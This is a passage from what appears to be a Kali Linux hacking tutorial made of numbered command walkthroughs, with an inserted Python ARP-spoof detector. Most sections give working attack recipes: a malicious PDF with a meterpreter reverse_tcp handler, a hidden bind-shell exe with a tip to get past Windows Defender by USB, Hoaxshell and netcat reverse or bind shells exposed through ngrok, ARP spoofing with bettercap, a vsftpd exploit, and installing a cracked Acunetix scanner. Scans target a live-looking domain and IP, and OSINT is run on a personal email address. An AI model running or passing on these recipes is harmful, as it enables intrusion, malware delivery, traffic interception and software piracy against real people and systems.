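    valid_token "$_token" || { echo "token is not UUID-shaped" >&2; return 4; }
    # The URL goes to curl on stdin (-K -), so the token never appears in
    # the process list. No -k: the server certificate is verified.
    _reply=$(printf 'url = "%s"\n' "$(build_url "$_domains" "$_token" "")" |
        curl --silent --show-error --max-time 20 -K -) || return 5
    printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$_reply" >> "$DUCK_DIR/duck.log"
    reply_ok "$_reply" || { echo "Duck DNS replied: $_reply" >&2; return 6; }
}

# Usage: ./duck.sh kakarstore   (after: chmod 600 ~/duckdns/token)
if [ "$#" -eq 1 ]; then
    update_duckdns "$1"
fi
```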
Host your own fast OSiNT username search web-server
1: Install Blackbird.
Command: git clone https://github.com/p1ngul1n0/blackbird.git
2: Go to Blackbird.
Command: cd blackbird
3: Install Blackbird requirements.
Command: pip install -r requirements.txt
4: Check site lists.
Command: python3 blackbird.py --list-sites
5: Search username.
Command: python3 blackbird.py -u kakarstore
6: Start Webserver.
Command: python3 blackbird.py web
7: Open the webserver link.
The website Link looks like this: http://127.0.0.1:9797/
8: Check username.
Social Engineering Toolkit (SET)
1: Open Social Engineering Toolkit (SET) which is installed by default in Kali Linux.
2: Start social engineering toolkit.
Command: setoolkit
Discover and extract hostnames of target IP addresses
1: Upgrade packages.
Command: apt upgrade
2: Install hosthunter.
Command: hosthunter
3: Check hosthunter help.
Command: hosthunter -h
4: Check IP hostname.
Command: hosthunter -t 185.151.30.175 -f txt -o kakarstore
5: Check the IP hostname file.
Command: cat kakarstore
6: For multiple IPs first create a file of multiple IPs.
7: Go to the Desktop directory and save the ip.list file.
Command: cd Desktop
8: Scan multiple IP files.
Command: hosthunter ip.list -b
9: -b means Bing.
Information Gathering | DNS-ENUM
1: Go to the Kali Linux search bar.
2: Information Gathering - DNS Analysis - dnsenum.
Command: dnsenum
3: Scan Website.
Command: dnsenum --dnsserver 8.8.8.8 kakarstore.com
4: DNS-ENUM help.
Command: dnsenum -h
Information gathering | DNS-RECON
1: Open dnsrecon.
Command: dnsrecon
2: DNS-RECON help.
Command: dnsrecon -h
3: Scan website DNS.
Command: dnsrecon -d kakarstore.com
Command: dnsrecon -d kakarstore.com -f -a -s -y
Information Gathering | IDS and IPS Identification lbd
1: Open lbd.
Command: lbd
2: lbd - load balancing detector.
3: Checks if a given domain uses load balancing.
Command: lbd kakarstore.com
Information Gathering | IDS and IPS Identification - wafw00f
1: Open wafw00f.
Command: wafw00f
2: wafw00f help.
Command: wafw00f -h
3: Scan website.
Command: wafw00f https://www.kakarstore.com
using dmitry
1: Dmitry help.
Command: dmitry
2: Scan for the full information.
Command: dmitry -oiwnsepf -o /home/kakar/Desktop/kakarstore.txt kakarstore.com
Website nameserver information nslookup
1: Find website name server information.
Command: nslookup kakarstore.com
whois lookup
1: Scan website details.
Command: whois kakarstore.com
Metasploit
1: Run Metasploit.
Command: msfconsole
2: Run manually in kali linux.
Go to: Exploitation Tool Metasploit framework
3: Metasploit help.
Command: help
Hydra
1: Hydra help.
Command: hydra -help
2: Open Hydra manually in kali linux.
Go to: Password Attacks - Online Attacks - Hydra
What is the Payload
1: Run setoolkit.
Command: setoolkit
2: Select 1 for Social-Engineering Attacks.
Command: 1
3: Select 1 Spear-Phishing Attack Vector.
Command: 1
4: Select 2 for Create a FileFormat Payload.
Command: 2
5: Select 13 Adobe PDF Embedded EXE Social
Engineering.
Command: 13
6: Create a new PDF File Select 2.
Command: 2
7: Select 2.
Command: 2
8: Check Kali Linux IP are the same as LHOST.
Command: ifconfig
9: Enter it.
10: Connect Port.
Command: 4444
11: Rename the PDF File name.
Command: 2
New Filename: kakarstorepdf
12: Exit it.
Command: exit
Command: exit
Command: no
13: Return to Main Menu.
Command: 99
Command: 99
Command: 99
14: Clear the terminal.
Command: clear
15: Where is the malicious pdf saved?
Command: cd /root/.set/
Command: ls
16: Convert Malicious file kakarstorepdf into
PDF.
Command: mv kakarstorepdf kakarstorepdf.pdf
17: Move Malicious file on Desktop.
Command: mv kakarstorepdf.pdf
/home/kakar/Desktop/
18: Open the pdf file on a
personal pc for this pdf file to open it.
19: After opening the pdf file now open
msfconsole.
Command: msfconsole
20: Follow this command in msfconsole.
Command: use exploit/multi/handler
21: Set payloads.
Command: set payload
windows/meterpreter/reverse_tcp
22: Go to Show options.
Command: show options
23: Copy Kali Linux IP.
Command: ifconfig
24: Set IP.
Command: set LHOST 192.168.43.247
25: Know to check IP (LHOST) and LPORT.
Command: show option
26: Run it.
Command: run
Lynis: Perform Security Auditing and Vulnerability Analysis
1: Install Lynis.
Command: git clone https://github.com/CISOfy/lynis.git
2: Go to the lynis directory.
Command: cd lynis/
3: Give Executable permissions.
Command: chmod +x lynis
4: Start System Audit.
Command: ./lynis audit system
How Hackers control your PC
1: Install Hoaxshell.
Command: git clone
https://github.com/t3l3machus/hoaxshell.git
2: Go to the hoax-shell directory.
Command: cd hoaxshell
3: Install hoax-shell requirements.
Command: pip3 install -r requirements.txt
4: Give Executable permissions.
Command: chmod +x hoaxshell.py
5: Run hoaxshell.
Command: ./hoaxshell.py
6: Try your system copy system IP.
Command: ifconfig
8: Run it.
Command: ./hoaxshell.py -s 192.168.43.247
9: Generate reverse shell payload.
10: Copy Generate payload and paste it into
Command Prompt.
11: Check the reverse shell.
Command: net user
12: Check whoami.
Command: whoami
13: Print Working Directory.
Command: pwd
14: Going back.
Command: cd ..
15: Go to Desk.
Command: D:
16: Check D Directory.
Command: dir
Run Multiple Linux OS Inside the Terminal with GUI Tools
1: Install Podman.
Command: apt install podman
2: Install DISTRO BOX.
Command: curl -s https://raw.githubusercontent.com/89luca89/distrobox/main/install | sudo sh
3: Check Distro Box commands.
Command: distrobox
4: Install Fedora OS the root.
Command: distrobox-create -n fedora --image fedora:latest
Command: distrobox-create -n fedora --image fedora:37
5: Check distrobox list.
Command: distrobox-list
6: Run fedora.
Command: distrobox-enter fedora
7: Check fedora information.
Command: cat /etc/os-release
8: Install neofetch in fedora.
Command: sudo yum install neofetch
9: Run neofetch.
Command: neofetch
10: Logout from fedora.
Command: logout
11: Install kali-rolling in the root terminal.
Command: distrobox-create -n kali --image kali-rolling:latest
12: Check Lists.
Command: distrobox-list
13: Start Kali.
Command: distrobox-enter kali
14: Kali Information.
Command: cat /etc/os-release
15: Install Neofetch, Firefox, and Guymager.
Command: sudo apt install neofetch firefox-esr guymager
16: Run Neofetch.
Command: neofetch
17: Run Firefox.
Command: firefox
18: Run Guymager.
Command: sudo guymager
19: Install Centos.
Command: distrobox-create -n centos --image centos:latest
20: Check Lists.
Command: distrobox-list
21: Stop fedora if you want.
Command: distrobox-stop fedora
22: If you want to remove containers.
Command: distrobox-rm centos
How can hackers take control of your PC
1: Check the current IP Address.
Command: ifconfig eth0 | grep inet
2: Create Metasploit.
Command: msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.43.111 lport=4444 -f exe > kakarstore.exe
3: Convert kakarstore.exe into txt.
Command: cp kakarstore.exe kakarstore.txt
4: Create a PHP web server.
Command: php -S 192.168.43.111:80
5: Copy the kakar.txt file and kakar.exe and paste them into Windows.
6: Open the kakar.txt file or kakar.exe in Windows.
7: If they do not open because of Windows Defender, then copy these files to USB.
Bettercap Framework
1: Install Bettercap.
Command: bettercap
2: Bettercap help.
Command: bettercap -h
3: Start Bettercap.
Command: bettercap
4: How to use it.
Command: help
5: Check Module Help.
Example: help net.probe
6: Start Module.
Command: net.probe on
7: Check discovered hosts.
Command: net.show
8: Https server help.
Command: help https.server
9: Modules.
10: Https Server Parameter.
Command: set https.server.path /var/www/html
11: Show Parameter.
Command: get https.server.path
12: On Https Server.
Command: https.server on
13: Open Link in the browser.
Command: https://192.168.43.111:443
14: Off Https Server.
Command: https.server off
15: Arp Spoof help.
Command: help arp.spoof
16: Set Arp Spoof Parameter.
Command: set arp.spoof.fullduplex true
17: Show Targets.
Command: net.show
18: Set Targets.
Command: set arp.spoof.targets 192.168.43.111
19: On Arp Spoof.
Command: arp.spoof on
20: Check Arp Spoof.
Command: arp -a
21: On Net Sniff.
Command: net.sniff on
22: Stop Net Sniff.
Command: net.sniff off
23: Stop Arp Spoof.
Command: arp.spoof off
24: Wifi Module help.
Command: help wifi
25: Enable Wifi Monitor Mode.
Command: sudo airmon-ng start wlan0
26: Set Wifi interface.
Command: set wifi.interface wlan0mon
27: Open Wifi recon module.
Command: wifi.recon on
28: Check to monitor wifi lists.
Command: wifi.show
29: Update caplets.
Command: caplets.update
30: Check caplets lists.
Command: caplets.show
31: Download UI.
Command: ui.update
32: Exit.
Command: exit
33: Changes in caplets.
Command: sudo nano /usr/local/share/bettercap/caplets/https-ui.cap
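A defender-side reading of the `arp -a` check in step 20, as an added example that is not from the original book: while spoofing is active, the poisoned cache shows one MAC address answering for the gateway and for another host. The sample table, the gateway address 192.168.43.1 and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of `arp -a` output on a Linux host (not a real capture).
# 192.168.43.1 is assumed to be the gateway of the lab network.
SAMPLE_ARP_A = """\
? (192.168.43.1) at 08:00:27:aa:bb:cc [ether] on eth0
? (192.168.43.111) at 08:00:27:aa:bb:cc [ether] on eth0
? (192.168.43.234) at 3c:52:82:11:22:33 [ether] on eth0
? (192.168.43.50) at <incomplete> on eth0
"""

# Matches Linux rows "(ip) at aa:bb:.." and Windows rows "ip   aa-bb-..   dynamic".
ENTRY = re.compile(
    r"\(?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
    r"(?P<mac>[0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})\b"
)
IGNORED_MACS = {"ff:ff:ff:ff:ff:ff"}  # broadcast rows legitimately repeat

def parse_arp_table(text):
    """Return {mac: sorted list of IPs} from `arp -a` output, skipping incomplete rows."""
    table = defaultdict(set)
    for line in text.splitlines():
        m = ENTRY.search(line)
        if not m:
            continue
        mac = m.group("mac").lower().replace("-", ":")
        if mac in IGNORED_MACS or mac.startswith("01:00:5e"):  # skip IPv4 multicast
            continue
        table[mac].add(m.group("ip"))
    return {mac: sorted(ips) for mac, ips in table.items()}

def find_spoof_suspects(text, gateway_ip=None):
    """List MACs claimed by several IPs and mark the ones that include the gateway."""
    suspects = []
    for mac, ips in parse_arp_table(text).items():
        if len(ips) > 1:
            suspects.append({"mac": mac, "ips": ips, "gateway_affected": gateway_ip in ips})
    return suspects

if __name__ == "__main__":
    for suspect in find_spoof_suspects(SAMPLE_ARP_A, gateway_ip="192.168.43.1"):
        print(suspect)
```

A duplicate MAC can also be legitimate (a host with several addresses on one interface), so a hit is a prompt to compare against the gateway's known MAC, not proof of spoofing.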
How to investigate an Email ID
1: Install Mosint.
Command: git clone https://github.com/alpkeskin/mosint.git
2: Go to the Mosint directory.
Command: cd mosint
3: Install basic requirements.
Command: pip3 install -r requirements.txt
4: Check the go version.
Command: go version
5: Install go language.
Command: sudo apt install golang
6: Check help.
Command: go run main.go -h
7: Check temporary e-mail.
Command: go run main.go -e walikhankakar313@gmail.com -verify
8: Set API key.
Command: nano keys.json
9: Check Gmail which is used in social media accounts.
Command: go run main.go -e walikhankakar313@gmail.com -social
10: Check Gmail used in the website or domain.
Command: go run main.go -e walikhankakar313@gmail.com -relateds
11: Gmail leaks.
Command: go run main.go -e walikhankakar313@gmail.com -leaks
12: Find Gmail which is used in the domain name.
Command: go run main.go -e walikhankakar313@gmail.com -domain
13: Save Gmail information in a file.
Command: go run main.go -e walikhankakar313@gmail.com -all -o kakarstore.txt
Netcat | Swiss army knife of hacking tools
1: Netcat help.
Command: nc -h
Command: netcat -h
2: Check Windows IP Address in Windows
PowerShell.
Command: ipconfig
3: Check windows system Ports.
Command: nc -nvz 192.168.43.234 1-100
Command: nc -nvz 192.168.43.234 1-3000
4: Connect with Ports.
Command: nc -nv 192.168.43.234 21
Master of hacker tool to perfect scan any website | Masscan
1: Open Masscan.
2: Go to Information Gathering > Live Host Identification > Masscan.
3: Find the website IP Address.
Command: ping kakarstore.com
4: Scan website Ports.
Command: masscan 185.151.30.175 -p 80
Command: masscan 185.151.30.175 -p 1000-1500
Mobile Security Framework
1: Install python3.
Command: apt install python3
Command: apt install python3-venv
2: Install MobSF.
Command: git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
3: Go to the MobSF directory.
Command: cd Mobile-Security-Framework-MobSF
4: Check or install MobSF packages.
Command: ./setup.sh
5: Run MobSF.
Command: ./run.sh 127.0.0.1:8000
6: Open the browser and paste this link into it.
Command: http://localhost:8000/
7: Upload files and analyze files.
How hackers
1: Install Maryam Framework.
Command: apt install maryam
2: Start Maryam.
Command: maryam
3: Check help.
Command: help
4: Check workspaces.
Command: show workspaces
Command: workspaces
5: Add workspaces.
Command: workspaces add kakarstore
6: Show options.
Command: show options
7: Increase timeout.
Command: set timeout 15
8: Check Modules.
Command: show modules
9: How to use DNS brute.
Command: dnsbrute
10: Find the domain.
Command: dnsbrute -d kakarstore.com -t 50
11: Check Crawl_pages.
Command: crawl_pages
11: Find hidden pages.
Command: crawl_pages -d kakarstore.com -r "https?://[A-z0-9\./]+"
12: Check searx.
Command: searx -q kakarstore -l 10
13: Check quora.
Command: quora -q kakarstore -l 10
14: Check Instagram Module.
Command: instagram
15: Check user name search.
Command: username_search
16: Search user name.
Command: username_search -q kakarstore -t 100
17: Check docs_search.
Command: docs_search
18: Find docs_search.
Command: docs_search -q hacker -f pdf -e google,bing,yandex,yahoo,duckduckgo -t 100
19: Use tweet_search.
Command: tweet_search -q kakarstore
20: Save Modules output.
Command: docs_search -q hacker -f pdf -e google,bing,yandex,yahoo,duckduckgo -t 100 --output
21: Check report.
Command: report
22: Generate output.
Command: report txt kakarstore_pdf osint/docs_search
23: Open a new terminal and check access to the saved txt, xml, or pdf file.
Command: cat .maryam/workspaces/kakarstore/kakarstore_pdf.txt
24: Save search user name output.
Command: report kakarstore username osint/username.kakarstore
Easily expose your localhost services to the internet
1: Start the apache2 server.
Command: service apache2 start
2: Open the localhost website in the browser.
Command: localhost
3: Forward localhost.
Website: http://localhost.run/
4: Generate ssh-keygen.
Command: ssh-keygen
5: Press Enter three times to accept the defaults.
6: Run localhost.
Command: ssh -R 80:localhost:80 localhost.run
Command: yes
Command: enter
7: Open localhost everywhere.
Website: https://04f2ceb5f03622.lhr.life
Stay Anonymous online like a pro
1: Install proxy chains and tor.
Command: apt install proxychains tor
2: Proxychains configuration setting.
Command: nano /etc/proxychains4.conf
3: Start tor service.
Command: sudo service tor start
4: Check tor service status.
Command: sudo service tor status
5: Run Firefox through proxychains (not as root).
Command: proxychains firefox
6: Scan the website anonymously.
Command: proxychains sudo nmap -sS kakarstore.com
How do Hackers Hack Websites? - Acunetix Pro Tool
1: Download the Acunetix zip file.
Website: https://gist.github.com/Ademking/fbc6977b555d930224b291bb26e44f2e
2: Extract the Acunetix zip file manually.
3: Open Acunetix and extract the zip file.
4: Open Terminal in the Acunetix extract folder.
5: Give root permissions.
Command: sudo su
6: Check the file list.
Command: ls
6: Give execute permissions.
Command: chmod +x acunetix_13.0.200217097_x64_.sh
7: Check executable permissions of acunetix_13.0.200217097_x64_.sh
Command: ls -l
8: Execute Acunetix.
Command: ./acunetix_13.0.200217097_x64_.sh
9: Enter to continue.
10: Accept the license.
Command: yes
11: Create a new host name if you want.
Command: write host name (kakarstore)
12: Use your Gmail.
13: Create a password.
14: Follow these commands.
Command: cp Crack/wvsc /home/acunetix/.acunetix/v_200217097/scanner/
Command: cp Crack/license_info.json /home/acunetix/.acunetix/data/license/
Command: systemctl start acunetix.service
15: Open https://kakar:109/ in the browser to access the Acunetix UI.
16: Change host name.
Command: nano /etc/hosts
17: Save and change the host name.
Command: ctrl + s
BIOS or Aborted error
1: BIOS or Aborted error.
2: Shut down the PC.
3: Press F10.
4: Go to Security
5: Go to Virtualization Technology
6: Enable
Twitter OSINT (Open Source Investigation)
1: Clone Twitter Intelligence Tool.
Command: git clone https://github.com/twintproject/twint.git
2: Go to the Twitter Intelligence Tool folder.
Command: cd twint
3: Install Twitter Intelligence Tool requirements.
Command: pip3 install -r requirements.txt
4: Install Pip.
Command: pip3 install twint
Command: pip3 install --user --upgrade git+https://github.com/twintproject/twint.git@origin/master#egg=twint
5: Install Pipenv.
Command: pipenv install git+https://github.com/twintproject/twint.git#egg=twint
Command: apt-get install pipenv
6: Check twint requirements lists.
Command: cat requirements.txt
Breaking SERVER Systems using MySQL
1: Scan MySQL port.
Command: nmap -p 3306 192.168.43.126 -v -sV --script=mysql*
2: Use Metasploitable2 Machine for MySQL testing.
3: Here we found MySQL port 3306 which is open.
4: We found two accounts that don't have passwords.
3: Connect to the victim MySQL.
Command: mysql -h 192.168.43.126 -u root
4: Show Databases.
Command: SHOW DATABASES;
5: Connect to the Database.
Command: connect dvwa;
6: Show tables.
Command: SHOW TABLES;
7: Exit terminal.
Command: exit
8: Open msfconsole.
Command: msfconsole
9: Search MySQL.
Command: search mysql
10: Exploit Auxiliary.
11: Copy Auxiliary.
Ex: auxiliary/scanner/mysql/mysql_login
12: Test Auxiliary.
Command: use auxiliary/scanner/mysql/mysql_login
13: Show options of Auxiliary.
Command: show options
14: Set RHOSTS.
Command: set RHOSTS 192.168.43.162
15: Run.
Command: run
16: Open Exploit-DB website.
Website: https://www.exploit-db.com/
Cmatrix
1: Install Cmatrix.
Command: cmatrix
2: Run Cmatrix.
Command: cmatrix
Show Neofetch on Kali Linux Terminal
1: Add Neofetch in zshrc.
Command: gedit .zshrc
2: Install lolcat.
Command: apt-get install lolcat
3: Scroll down.
4: Add neofetch name.
Command: neofetch | lolcat
5: Terminal new look.
How Hackers Exploit SSH to Hack Your System? | System Hacking using SSH
1: Scan Victim IP.
Command: nmap 192.168.43.126 -p 1-65535 -v -sS -sV -sC
2: Check SSH Port.
3: SSH Port is open.
4: SSH enumeration.
Command: nmap 192.168.43.126 -p 22 -v -sS -sV --script=*
5: SSH default credentials.
6: Connect Netcat to credentials.
Command: nc -v 192.168.43.126 22
7: Start msfconsole.
Command: msfconsole
8: Search SSH.
Command: search ssh
9: Find auxiliary/scanner/ssh/ssh_login.
10: Use auxiliary/scanner/ssh/ssh_login.
Command: use auxiliary/scanner/ssh/ssh_login
11: Show options.
Command: show options
12: Set victim IP in RHOSTS.
Command: set RHOSTS 192.168.43.126
13: Set username.
Command: set USERNAME user
14: Set password.
Command: set PASSWORD user
15: Run now.
Command: run
16: Access to sessions.
Command: sessions
17: Connect to sessions.
Command: sessions -i 1
18: Access now.
19: Check the file list.
Command: ls
20: Access Shell.
Command: shell
21: Search sshex.
Command: search sshex
22: Use exploit/multi/ssh/sshexec.
Command: use exploit/multi/ssh/sshexec
23: Show options.
Command: show options
24: Set PASSWORD.
Command: set PASSWORD user
25: Set USERNAME.
Command: set USERNAME user
26: Set RHOSTS.
Command: set RHOSTS 192.168.43.126
27: Show options.
Command: show options
28: Run.
Command: run
29: Check system files.
Command: ls
How Hackers Remotely Hack Any Device using FTP
1: Discover your active IP addresses which are working.
Command: netdiscover
2: Scan IP in Nmap.
Command: nmap 192.168.43.126 -v -sT -sV -p 1-65535 -O
3: FTP enumeration.
Command: nmap 192.168.43.126 -v -sT -sV -p 21 --script=ftp*
4: Try to log in with the help of Netcat.
Command: nc -v 192.168.43.126 21
5: Log in with the default user name and password.
Command: USER anonymous
Command: PASS anonymous
6: Login is successful.
7: Check the help.
Command: help
8: Try to log in with the default user name.
Command: nc -v 192.168.43.126 21
Command: USER user
Command: USER user
Command: PASS user
9: Check vulnerabilities from Exploit Database.
Website: https://www.exploit-db.com/
10: Download vsftpd 2.3.4 vulnerability file.
Website: https://www.exploit-db.com/exploits/49757
11: Go to Downloads directory.
Command: cd Downloads
12: Exploit vsftpd 2.3.4 file.
Command: python3 49757.py 192.168.43.126
13: Check the lists of exploitable system.
Command: ls
14: Check exploitable system IP.
Command: ifconfig
15: Reboot exploitable system anonymously.
Command: reboot
Hack Systems: How to use Netcat Commands with Examples?
1: Connect to the server.
Command: nc -nlvp 7878
2: Open the metasploitable2 machine.
3: Connect the Kali Linux IP in the metasploitable2 machine.
Command: nc -nv 192.168.43.36 7878
4: Write something in the metasploitable2 machine.
Example: Hi! How are you?
5: Go to the Kali Linux terminal and check the message.
6: Share the terminal.
Command: nc -nvlp 7878 -e /bin/bash
7: Go to the metasploitable2 machine and connect it again.
Command: nc -nv 192.168.43.36 7878
8: Execute the system in the metasploitable2 machine.
9: Check the lists in the metasploitable2 machine.
Command: ls
10: Go to the Downloads directory in the metasploitable2 machine.
Command: cd Downloads
11: Check the Downloads directory lists in the metasploitable2 machine.
Command: ls
12: Here the victim machine is the metasploitable2 machine.
13: Run the Ngrok.
Command: ./ngrok tcp 7878
14: Start the Netcat.
Command: nc -nlvp 7878 -e /bin/bash
15: Go to the metasploitable2 machine.
16: Find the port of Ngrok.io IP in the metasploitable2 machine.
Command: ping 0.tcp.ap.ngrok.io
17: Open Netcat command.
Command: nc -nv 13.229.3.203 10978
19: 10978 is the port of Ngrok.
20: Check the lists in the metasploitable2 machine.
Command: ls